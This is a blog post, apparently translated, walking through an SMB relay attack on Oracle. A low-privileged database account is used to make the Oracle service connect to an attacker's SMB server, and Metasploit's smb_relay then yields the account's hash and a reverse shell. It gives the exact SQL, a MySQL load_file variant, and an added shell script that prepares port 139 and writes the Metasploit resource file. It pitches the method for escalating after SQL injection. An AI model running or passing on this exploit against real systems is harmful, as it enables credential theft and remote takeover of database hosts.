I have been reading a document called "Penetration: from application down to OS (Oracle)" over the past few days. It seems interesting. The gist of the document is this: if the Oracle service runs under the administrator account, you only need a database account with the CONNECT and RESOURCE roles; you can then use Metasploit's smb_relay module to set up an SMB spoofing server locally and obtain system-level access. I tested it locally and it worked. :-)
Let's take a look at the detailed analysis of the principle. Here I will write down my testing process.
My penetration environment is Ubuntu 8.10 + Metasploit 3.3 dev; the Oracle database version is 10.2.0.1.0, the Oracle service runs with administrator privileges, and the database account is the dbsnmp account with its default privileges.
1. Run netstat to check whether local port 139 is already in use. The service that usually occupies this port is Samba; stop it. On Ubuntu, run sudo /etc/init.d/samba stop.
2. Start Metasploit and use the smb_relay module. The payload I chose is shell_reverse_tcp. Once the configuration is done, run exploit. netstat now shows ports 139 (the SMB server) and 8522 (the reverse-shell handler) listening locally.
3. Now connect to the Oracle database with the default dbsnmp account. By default this account has low privileges: only CONNECT and RESOURCE.
4. Then execute the following three SQL statements:
SQL> CREATE TABLE files (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6));
SQL> INSERT INTO files VALUES (1, '\\192.168.1.52\mickey', NULL);
SQL> CREATE INDEX file_index ON files (path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column ot_format');
When the CREATE INDEX statement runs, the Oracle Text file datastore tries to open the UNC path stored in the path column, and the Oracle host authenticates to our SMB server as the Windows account the Oracle service runs under. Check the local Metasploit console: it has captured the half LM hash of that service account from the Oracle host and returned a shell.
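The attacker-side part of the procedure above (steps 1 and 2), as an added example that is not part of the original post: a small POSIX shell script that checks whether TCP port 139 is already bound by parsing /proc/net/tcp directly (so it works even without net-tools), stops Samba if so, and writes the msfconsole resource script for the smb_relay module with a shell_reverse_tcp payload. The Metasploit module and option names (exploit/windows/smb/smb_relay, SRVHOST, SRVPORT, PAYLOAD, LHOST, LPORT, exploit -j) are assumed to match the installed version; 192.168.1.52 and 8522 simply mirror the values used in the post.

```sh
#!/bin/sh
# Added example, not from the original post: attacker-side preparation for
# steps 1 and 2 (free local port 139, then hand Metasploit a resource script
# for smb_relay with a shell_reverse_tcp payload).
# Assumptions: Linux with /proc/net/tcp; Metasploit module/option names as
# in the installed version; LHOST/LPORT values mirror the post.

# TCP port number -> 4-digit uppercase hex, the form used in /proc/net/tcp.
port_hex() {
    printf '%04X' "$1"
}

# Return 0 if some local socket is LISTENING (state 0A) on TCP port $1.
# Reads /proc/net/tcp and /proc/net/tcp6 directly instead of calling netstat.
port_listening() {
    p=$(port_hex "$1")
    for f in /proc/net/tcp /proc/net/tcp6; do
        [ -r "$f" ] || continue
        # field 2 is local_address as ADDR:PORT (hex), field 4 is the state
        if awk -v p="$p" 'NR > 1 { split($2, a, ":"); if (a[2] == p && $4 == "0A") found = 1 }
                           END { exit (found ? 0 : 1) }' "$f"; then
            return 0
        fi
    done
    return 1
}

# Print an msfconsole resource script (run it with: msfconsole -r smbrelay.rc).
# $1 = LHOST (address the victim connects back to), $2 = LPORT of the handler.
gen_msf_rc() {
    lhost=$1
    lport=$2
    cat <<EOF
use exploit/windows/smb/smb_relay
set SRVHOST 0.0.0.0
set SRVPORT 139
set PAYLOAD windows/shell_reverse_tcp
set LHOST $lhost
set LPORT $lport
exploit -j
EOF
}

# Step 1: make sure nothing (usually Samba) already owns port 139.
prepare_port_139() {
    if port_listening 139; then
        echo "port 139 is in use; stopping Samba" >&2
        sudo /etc/init.d/samba stop
    fi
    if port_listening 139; then
        echo "port 139 still in use; find the owner with: netstat -antp | grep :139" >&2
        return 1
    fi
    return 0
}

# Step 2 (interactive, so left commented out): write the resource file and start Metasploit.
# prepare_port_139 && gen_msf_rc 192.168.1.52 8522 > smbrelay.rc && msfconsole -r smbrelay.rc
```

After msfconsole has loaded the resource file, port_listening 139 and port_listening 8522 should both succeed, which is the same check the post performs with netstat before moving on to the database side.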
After a hint from pt007, I also tested MySQL. If the service is started as administrator, select load_file('\\\\192.168.1.52\\mk.txt') obtains system privileges. MSSQL should use the xp_dirtree stored procedure, but I did not configure the MSSQL service to run under the administrator account; if you know how it works, please advise.
This technique can be used when assessing intranet web applications: if there is SQL injection and the database service runs as administrator, it can be used to escalate privileges.
From www.dis9.com